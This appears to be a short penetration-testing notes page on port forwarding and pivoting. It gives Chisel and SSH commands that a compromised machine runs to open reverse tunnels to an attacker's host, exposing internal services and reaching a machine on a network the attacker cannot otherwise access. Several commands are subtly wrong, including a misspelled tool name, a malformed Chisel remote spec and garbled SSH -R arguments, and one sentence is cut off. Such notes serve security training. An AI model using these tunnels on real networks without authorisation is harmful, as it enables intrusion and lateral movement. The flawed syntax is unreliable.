Port Forwarding
Port forwarding is a technique where the service running on the target machine / on any other machine on the network is forwarded to the attacker's machine which can be then accessed locally
Commonly used tools
- Chisel
- SSH
Local port forwarding is a technique to transfer the service running on the compromised machine to the attackers' machine
Attackers Machine:
./chisel server -p 1337 --reverse
Compromised machine
# forwarding service on the compromised machine on port 5000 to attacker machines port 5000
./chisel client attackerip:1337 R:5000:127.0.0.1:5000
# The same on ssh
# Format: ssh -L attckermahineport:127.0.0.1:targetserviceport [email protected]
ssh -L 5000:127.0.0.1:5000 [email protected]
Remote port forwarding is a technique to transfer the service running on the machine which is persent in the same network as the compromised machine to the attackers' machine
Network Setup:
Machine A : Attackers Machine
Machine B : Compromised Machine ( Has an network card to communicate with Y network )
Machine C : Machine on Y network
A ---> B ( Attacker can communicate with the Machine B )
B ---> C ( Machine B can communicate with both A and C with different network cards )
A --x-> C ( Attacker cannot communicate with the C since they are
Attackers Machine:
./chiel server -p 9001 --reverse
Compromised Machine ( Machine B ):
# Machine C has a service on its port 3000 which has to be forwarded to attacker machine's port 3000
./chisel client attackerip:9001 R:3000:127.0.0.1:machineCIP:3000
# The same can be performed with SSH
# Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [[email protected]]SSH_SERVER
ssh -R machineCIP:3000:127.0.0.1:3000 [email protected]
Dynamic Port forwarding is a pivoting technique which allows the attacker to access the services fully running on the compromized system with the use of proxychains
Last modified 9mo ago